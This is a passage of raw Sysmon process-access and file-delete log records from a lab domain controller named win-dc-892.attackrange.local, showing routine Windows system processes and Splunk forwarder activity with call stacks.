r.dll+635e 10341000x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.564{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.564{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.564{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.284{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB430117CBD977FB1E62A892A093E230,SHA256=A3D34CFDE4BC46467B122B40EA3822CF44F5DD52263AB5AF8AFA2EC3C40E82B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.237{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B125B5C6EC14FD580930394900721F3,SHA256=4D4CEB1AC2A63ED715BA9DF21E13297B1B2CDB6C2B9C4478D7A44A0C0442F06B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 